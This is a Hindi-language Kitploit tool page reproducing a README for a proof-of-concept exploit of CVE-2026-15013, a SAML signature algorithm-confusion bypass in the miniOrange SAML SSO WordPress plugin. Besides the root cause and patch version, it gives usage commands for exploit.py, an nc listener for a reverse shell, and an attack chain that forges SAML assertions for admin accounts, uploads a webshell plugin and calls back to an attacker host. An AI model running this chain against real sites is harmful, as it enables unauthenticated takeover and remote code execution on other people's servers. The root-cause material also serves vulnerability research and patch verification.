Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-15013 — CVE-2026-15013 के लिए एक्सप्लॉइट: एल्गोरिदम कन्फ्यूज़न के माध्यम से बिना प्रमाणीकरण (unauthenticated) SAML ऑथ बाइपास। प्रशासक (admin) पहुँच प्राप्त करने और webshell/reverse shell तैनात करने के लिए SAML प्रतिक्रियाओं को जाली बनाता है। केवल अधिकृत परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/zer0dayf/cve-2026-15013
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिपेलोड जनरेशनवेब एप्लिकेशन शोषणपोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubzer0dayf/cve-2026-15013

CVE-2026-15013

CVE-2026-15013 के लिए एक्सप्लॉइट: एल्गोरिदम कन्फ्यूज़न के माध्यम से बिना प्रमाणीकरण (unauthenticated) SAML ऑथ बाइपास। प्रशासक (admin) पहुँच प्राप्त करने और webshell/reverse shell तैनात करने के लिए SAML प्रतिक्रियाओं को जाली बनाता है। केवल अधिकृत परीक्षण के लिए।

1232 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2026-15013 — miniOrange SAML SSO <= 5.4.3 प्रमाणीकरण बायपास (PoC)

CVE-2026-15013 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: miniOrange SAML Single Sign On – SSO Login WordPress प्लगइन (संस्करण 5.4.3 तक, समावेशी) में SAML सिग्नेचर एल्गोरिथम कन्फ्यूजन (HMAC-SHA1) के माध्यम से बिना प्रमाणीकरण के ऑथेंटिकेशन बायपास।

केवल अधिकृत परीक्षण। इस कोड का उपयोग केवल उन्हीं सिस्टमों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। कंप्यूटर सिस्टमों तक अनधिकृत पहुँच अवैध है।

श्रेय

भूमिका
भेद्यता खोजकर्ताlhking (CVE रिकॉर्ड में श्रेय)
CVE / CNAWordfence
यह रिपॉजिटरीस्वतंत्र प्रयोगशाला पुनरुत्पादन / PoC स्वचालन (मूल खोज नहीं)

CVE रिकॉर्ड: https://www.cve.org/CVERecord?id=CVE-2026-15013

मूल कारण

Mo_SAML_Utilities::mo_saml_cast_key() हमलावर-नियंत्रित SAMLResponse से SignatureMethod एल्गोरिथम पर भरोसा करता है। जब इसे HMAC-SHA1 पर सेट किया जाता है, तो प्लगइन IdP की RSA सार्वजनिक कुंजी को HMAC साझा रहस्य के रूप में पुनः व्याख्यायित करता है और इसी के साथ हस्ताक्षर सत्यापित करता है। जो कोई भी IdP प्रमाणपत्र (अक्सर सार्वजनिक मेटाडेटा) पढ़ सकता है, वह किसी भी मौजूदा WordPress उपयोगकर्ता — जिसमें व्यवस्थापक भी शामिल हैं — के लिए एक वैध assertion जाली बना सकता है।

5.4.4+ में पैच किया गया (असुरक्षित एल्गोरिथम / HMAC अस्वीकृत)।

CVSS

9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

आवश्यकताएँ

  • Python 3.10+
  • openssl CLI (प्रमाणपत्र से सार्वजनिक कुंजी निकालने के लिए)
  • लक्ष्य WordPress साइट तक नेटवर्क पहुँच और, स्वचालित कुंजी प्राप्ति के लिए, IdP SAML डिस्क्रिप्टर तक नेटवर्क पहुँच

निर्भरताएँ स्थापित करें:

pip install -r requirements.txt

उपयोग

पूर्ण श्रृंखला (enum, HMAC लॉगिन, admin, वेबशेल):

python3 exploit.py -u https://TARGET.example

वैकल्पिक रिवर्स शेल (पहले listener प्रारंभ करें: nc -lvnp 4444):

python3 exploit.py -u https://TARGET.example --lhost YOUR_IP --lport 4444

केवल लॉगिन (शेल नहीं):

python3 exploit.py -u https://TARGET.example --no-shell

मैन्युअल ओवरराइड:

python3 exploit.py -u https://TARGET.example \
  --issuer https://idp.example/realms/xxx \
  --nameid admin \
  -k ./idp-pubkey.pem

तर्क

Flagविवरण
-u, --urlWordPress आधार URL (आवश्यक)
-k, --hmac-keyPEM सार्वजनिक कुंजी या प्रमाणपत्र फ़ाइल; खाली होने पर IdP मेटाडेटा से प्राप्त करें
--issuerIdP issuer ओवरराइड करें
--acsACS URL ओवरराइड करें
--nameidएकल WordPress उपयोगकर्ता-नाम बाध्य करें
--lhost / --lportरिवर्स शेल कॉलबैक (डिफ़ॉल्ट पोर्ट 4444)
--no-shelladmin सत्र के बाद रुकें
--no-reverseशेल अपलोड करें लेकिन रिवर्स ट्रिगर न करें

प्रवाह

  1. WordPress और प्लगइन संस्करण का पता लगाएँ (<= 5.4.3 होना चाहिए)
  2. ACS, SP entityID, IdP issuer खोजें
  3. IdP साइनिंग प्रमाणपत्र (मेटाडेटा) प्राप्त करें और सार्वजनिक कुंजी PEM (HMAC रहस्य) निकालें
  4. WordPress उपयोगकर्ताओं को एन्यूमरेट करें
  5. प्रत्येक उम्मीदवार उपयोगकर्ता के लिए HMAC-SHA1 हस्ताक्षरित SAMLResponse जाली बनाएँ
  6. install_plugins (admin) वाले खाते का चयन करें
  7. वेबशेल प्लगइन अपलोड करें (exp/shell.php?c=id)
  8. --lhost के माध्यम से वैकल्पिक रिवर्स शेल

अस्वीकरण

यह परियोजना केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए है। लेखक और योगदानकर्ता दुरुपयोग के लिए उत्तरदायी नहीं हैं। तृतीय-पक्ष सिस्टमों का परीक्षण करने से पहले हमेशा लिखित अनुमति प्राप्त करें। मूल भेद्यता की सूचना जिम्मेदार प्रकटीकरण (responsible disclosure) के माध्यम से दी गई थी; यह रिपॉजिटरी केवल सीखने और बचाव सत्यापन के लिए पुनरुत्पादन प्रदर्शित करती है।

संदर्भ

  • https://www.cve.org/CVERecord?id=CVE-2026-15013
  • https://www.wordfence.com/threat-intel/vulnerabilities/id/ee95092d-6351-4612-872d-284165bc1201?source=cve
  • प्लगइन फिक्स: miniOrange SAML 5.4.4+

लाइसेंस

शोध उपयोग के लिए। कोई वारंटी नहीं।

टूल डाउनलोड करें